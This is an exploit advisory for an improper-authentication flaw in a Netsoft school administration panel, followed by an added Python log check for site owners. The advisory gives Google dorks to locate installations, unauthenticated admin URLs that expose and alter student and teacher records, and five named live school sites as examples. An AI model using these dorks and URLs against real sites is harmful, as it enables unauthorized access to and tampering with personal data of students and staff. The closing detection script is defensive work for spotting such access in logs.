#################################################################################################
# Exploit Title : WordPress Developed by Netsoft Limited Software Development BD Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/09/2018
# Vendor Homepages : netsoft.com.bd ~ netsoft.net ~ netsoft-ltd.net ~ linkedin.com/company/net-soft-ltd
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-284 [ Improper Access Control ] - CWE-287 [ Improper Authentication ]
#################################################################################################
# WordPress Datacenter Developed by Netsoft Limited Software Development Bangladesh Improper Authentication Vulnerability
# Google Dorks :
intext:''Datacenter :: A Product of Netsoft Ltd''
intext:''Copyright © Netsoft Ltd., all rights reserved''
intext:''Developed by : Netsoft Limited.''
# Admin Control Panel Path URL Links =>
/nsAdmin/index.php
/nsAdmin/index.php?url=./login.php
/wp-login.php
These paths do not require a username or password.
Append them to the target URL.
# Exploits :
/nsAdmin/index.php?url=view_student.php&division=0&dis3=0
/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0
/nsAdmin/index.php?url=class_details.php&division=0&dis3=0
/nsAdmin/index.php?url=update_teacher.php&teacher_id=4495
/nsAdmin/index.php?url=teacher_entry.php
/nsAdmin/index.php?url=class_entry.php
#################################################################################################
# Example Site => hmahdm.edu.bd/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0 => [ Proof of Concept ] => archive.is/BBwsZ
mukm.edu.bd/nsAdmin/index.php?url=teacher_details.php&teacher_id=3
jpphs.edu.bd/nsAdmin/index.php?url=class_details.php&division=0&dis3=0
iahs1988.edu.bd/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0
mghs1992.edu.bd/nsAdmin/index.php?url=teacher_details.php&division=0&dis3=0
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
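# Detection (added example) :
Added example for site owners, not part of the original advisory and not Netsoft's code: a log check that flags HTTP 200 responses for /nsAdmin/ pages sent to clients that never completed a login. Assumptions: access logs in the common "combined" layout, a login that is a POST to login.php answered with a 302 (the real login flow is not described above), and the client IP as a rough stand-in for a session. The sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (documentation IP ranges, not taken from any real site).
SAMPLE_LOG = """\
198.51.100.7 - - [05/Sep/2018:10:00:01 +0000] "GET /nsAdmin/index.php?url=./login.php HTTP/1.1" 200 1532
198.51.100.7 - - [05/Sep/2018:10:00:09 +0000] "POST /nsAdmin/index.php?url=./login.php HTTP/1.1" 302 0
198.51.100.7 - - [05/Sep/2018:10:00:10 +0000] "GET /nsAdmin/index.php?url=teacher_entry.php HTTP/1.1" 200 4211
203.0.113.9 - - [05/Sep/2018:10:02:44 +0000] "GET /nsAdmin/index.php?url=view_student.php&division=0&dis3=0 HTTP/1.1" 200 18873
203.0.113.9 - - [05/Sep/2018:10:02:51 +0000] "GET /nsAdmin/index.php?url=update_teacher.php&teacher_id=4495 HTTP/1.1" 200 6120
203.0.113.20 - - [05/Sep/2018:10:05:00 +0000] "GET /nsAdmin/index.php?url=class_entry.php HTTP/1.1" 302 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
ADMIN_PATH = "/nsadmin/index.php"

def page_of(target):
    """Return the page named by url= for an nsAdmin request, else None."""
    parts = urlsplit(target)
    if parts.path.lower() != ADMIN_PATH:
        return None
    value = parse_qs(parts.query).get("url", [""])[0]
    return value.lstrip("./").lower()  # "./login.php" -> "login.php"

def find_unauthenticated_hits(log_text):
    """List (ip, timestamp, page) for admin pages served with no prior login."""
    logged_in = set()  # client IPs seen completing the assumed login POST
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, when, method, target, status = m.groups()
        page = page_of(target)
        if page is None:
            continue
        if page in ("", "login.php"):
            if method == "POST" and status == "302":
                logged_in.add(ip)
            continue
        # A 302 back to the login page is the expected answer for an
        # anonymous client; a 200 means the page content was served.
        if status == "200" and ip not in logged_in:
            findings.append((ip, when, page))
    return findings

if __name__ == "__main__":
    for ip, when, page in find_unauthenticated_hits(SAMPLE_LOG):
        print(f"{when} {ip} served {page} without login")
```

Any finding on a real log means the panel answers anonymous requests and needs a server-side session check on every /nsAdmin/ page, or should be restricted at the web server until the vendor fixes it.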